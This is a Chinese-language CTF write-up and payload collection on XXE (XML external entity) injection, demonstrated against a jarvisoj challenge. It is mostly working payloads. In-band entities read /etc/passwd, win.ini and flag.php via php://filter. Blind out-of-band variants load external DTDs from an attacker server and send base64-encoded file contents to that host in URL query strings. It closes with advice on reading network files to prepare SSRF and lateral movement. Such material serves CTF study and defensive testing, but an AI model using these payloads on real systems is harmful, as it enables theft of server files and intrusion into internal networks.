XXE漏洞检测

2020-05-12  migrate_
http://web.jarvisoj.com:9882/
#实例演示一道CTF题目
#目的是获取/home/ctf/flag.txt的内容
先把请求头 Content-Type 改为 application/xml，再把请求体替换为下面的 XML 即可。这类直接在元素内引用实体（如 &test;）的 payload 属于“有回显”利用：只有服务端把解析结果回显到响应里时才能看到文件内容；若没有回显（盲 XXE），要改用后文的带外（OOB）方式。本题把 file:///etc/passwd 换成 file:///home/ctf/flag.txt 即可读取 flag。
<!-- in-band probe: the SYSTEM entity is expanded inside <foo>; /etc/passwd only becomes visible if the application echoes the parsed element back in its response -->
<!DOCTYPE foo [<!ENTITY test  SYSTEM "file:///etc/passwd" >]><foo>&test;</foo>
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe1 [<!ELEMENT name ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><root><name>&xxe;</name></root>
<!-- same in-band read as the one-line payload above, with an XML declaration and an <!ELEMENT> declaration added; the <!ELEMENT> is not needed for the attack, a non-validating parser ignores it -->
<!-- verbatim repeat of the first one-line probe (kept as in the original write-up) -->
<!DOCTYPE foo [<!ENTITY test  SYSTEM "file:///etc/passwd" >]><foo>&test;</foo>
<?xml version="1.0" encoding="UTF-8"?>
<!-- internal-entity probe: no file or network access is involved, the entity is a literal string; if "66666666666666666666" shows up in the response the parser expands entities (and reflects output), so the SYSTEM payloads are worth trying next -->
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe "66666666666666666666">]>
<foo>&xxe;</foo>
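<?xml version="1.0" encoding="ISO-8859-1"?>
<!-- CTF file read (PHP targets only, php:// wrappers exist only when the parser runs inside PHP): php://filter base64-encodes flag.php so the PHP source is returned as plain text instead of being parsed as markup; base64-decode the <user> value afterwards. -->
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php" >]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>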
<?xml version="1.0" encoding="UTF-8"?>
<!-- Windows variant of the in-band read: win.ini is world-readable on every Windows install, so it is a safe "does file:// work here" check; use forward slashes after file:/// as below -->
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
<foo>&xxe;</foo>
<?xml version="1.0" encoding="utf-8"?>
<!-- external-DTD variant: the parameter entity %xxe; fetches b.dtd from the attacker host, and b.dtd declares the general entity b that is referenced below; this requires outbound HTTP from the target to the attacker host -->
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY  % xxe SYSTEM "http://120.xx.xx.xx/webshella1231b/b.dtd" >
%xxe;]>
<foo>&b;</foo>
<!-- contents of b.dtd (served at http://120.xx.xx.xx/webshella1231b/b.dtd): declares the general entity b that the request body above references as &b; -->
<!ENTITY b SYSTEM "file:///etc/passwd">
#用 Burp 发送的请求体（带外/OOB 方式，适用于无回显的盲 XXE；DTD 放在攻击者服务器上）
<?xml version="1.0"?>
<!-- blind/OOB variant: the DTD is entirely external (payload3.dtd). The file is leaked by &xxe; resolving to a URL on the attacker host that carries the base64 content in its query string, so nothing has to be reflected in the response; read it from the attacker web server's access log. The DOCTYPE name "data" does not match the root <catalog>, which is only a validity error and should be ignored by a non-validating parser. -->
<!DOCTYPE data SYSTEM "http://120.27.xx.xx/webshella1231b/payload3.dtd">
<catalog>
   <core id="test101">
      <author>John, Doe</author>
      <title>I love XML</title>
      <category>Computers</category>
      <price>9.99</price>
      <date>2018-10-01</date>
      <description>&xxe;</description>
   </core>
</catalog>
#payload3.dtd 文件内容（放在攻击者服务器 http://120.27.xx.xx/webshella1231b/ 下，泄露的 base64 数据会出现在该服务器的访问日志里）
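<!-- payload3.dtd, hosted at http://120.27.xx.xx/webshella1231b/payload3.dtd -->
<!-- %file; holds the base64 of /etc/passwd. base64 keeps newlines and XML/URL-special characters out of the entity value and the query string; the SYSTEM literal must be quoted (the original was missing the opening quote). -->
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!-- %all; expands to a declaration of the general entity xxe whose SYSTEM URI carries the file content. A parameter-entity reference inside a markup declaration is only allowed in an external DTD, which is why this nesting lives here and not in the request body. -->
<!ENTITY % all "<!ENTITY xxe SYSTEM 'http://120.27.xx.xx/webshella1231b/?%file;'>">
%all;
<!-- large files will exceed the URL length limit of the server or the parser, so target small files or read them in pieces -->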
#用 Burp 发送的第二种 OOB 请求体（只有 DOCTYPE，没有根元素）
<!-- request body for the second OOB variant. There is no root element, so the document is not well-formed; the internal subset (and with it %remote; %int; %send;) is processed before the parser reaches the missing root, so the exfiltration request should already have been sent, but confirm this against the target parser. %remote; loads payload2.dtd, %int; declares the parameter entity send, %send; performs the HTTP request that carries the file. -->
<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://120.27.xx.xx/webshella1231b/payload2.dtd">
%remote;%int;%send;
]>
#payload2.dtd 文件内容（这一份以 Windows/phpStudy 靶机为目标）
<!-- payload2.dtd, hosted at http://120.27.xx.xx/webshella1231b/payload2.dtd -->
<!-- %file; holds the base64 of robots.txt on a Windows phpStudy box; php://filter only works when the parser runs inside PHP -->
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/phpStudy/WWW/robots.txt">
<!-- &#37; is a literal percent sign: once %int; is expanded in the request body it declares the parameter entity send. Writing "%" directly inside this entity value would be read as a parameter-entity reference. %file; itself is expanded right here, so the base64 content ends up inside send's URL and is delivered to the attacker host when %send; is referenced. -->
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://120.27.xx.xx/webshella1231b/?%file;'>">
拿到 /etc/passwd 之后，可以继续尝试读取 /etc/network/interfaces、/proc/net/arp、/etc/hosts 等文件，以了解靶机所在内网的地址、网关和相邻主机，为后续的 SSRF 或横向移动做准备。